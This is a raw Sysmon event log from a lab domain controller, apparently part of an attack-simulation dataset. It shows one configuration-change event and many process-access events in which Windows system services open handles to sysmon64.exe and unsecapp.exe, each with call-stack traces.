16341600x80000000000000001Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local2020-10-09 10:39:12.905c:\Program Files\ansible\AttackRangeSysmon.xmlSHA1=662E68DD6B3360E156BDE1F54FD3ED5BB76E8AFC 10341000x800000000000000034Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:13.030{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000033Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:13.030{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000032Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:13.030{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000031Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:13.030{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000030Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:13.030{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000029Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:13.030{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000028Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:13.030{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000027Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:13.030{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000026Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:13.030{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000025Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:13.030{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000024Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:13.030{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000023Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:13.030{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000022Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:13.030{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000021Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:13.030{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000020Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:13.030{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000019Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:13.030{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000018Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:13.030{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000017Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:13.030{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000016Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:13.030{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000015Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:13.030{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000014Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:13.014{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000013Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:13.014{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000012Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:13.014{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000011Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:12.999{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-EE02-000000007E01}4480C:\Windows\system32\wbem\unsecapp.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000010Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:12.983{733EE690-3C5B-5F80-0500-000000007E01}640764C:\Windows\system32\csrss.exe{733EE690-3DD0-5F80-EE02-000000007E01}4480C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 